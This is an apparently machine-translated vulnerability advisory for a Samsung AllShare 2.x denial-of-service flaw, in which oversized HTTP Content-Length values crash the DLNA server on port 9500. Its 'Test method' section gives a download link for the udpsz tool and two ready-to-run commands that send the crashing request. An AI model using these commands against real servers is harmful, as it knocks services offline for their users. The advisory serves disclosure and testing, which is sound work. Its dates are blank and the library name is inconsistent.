Release date:
Updated on:
Affected Systems:
Samsung AllShare 2.x
Description:
--------------------------------------------------------------------------------
The AllShare software allows the PC to run many AllShare services. The playback stream over the local network can share videos, images, and music between the PC and other devices.
When Samsung AllShare processes the HTTP header, the libpin3_dll.dll module has a null pointer reference error. If the "Content-Length" value is between 4294967262 and 4294967293, it will cause an error in MSVCR90.calloc. Local attackers can exploit this vulnerability to cause DoS attacks on the DLNA server by adding a large value to the "Content-Length" header and sending it to TCP port 9500. This vulnerability is located in the lupin3 (libpin3) Library.
<* Source: Luigi Auriemma (aluigi@pivx.com)
Link: http://secunia.com/advisories/49209/
Http://aluigi.altervista.org/adv/allshare_1-adv.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://aluigi.org/testz/udpsz.zip
Udpsz-c "POST/DocumentViewer/Control/blah HTTP/1.1 \ r \ nCONTENT-LENGTH: 2147483647 \ r \ n"-t server 9500-1
Or
Udpsz-c "POST/DocumentViewer/Control/blah HTTP/1.1 \ r \ nCONTENT-LENGTH: 4294967293 \ r \ n"-t server 9500-1
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Samsung
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.samsung.com/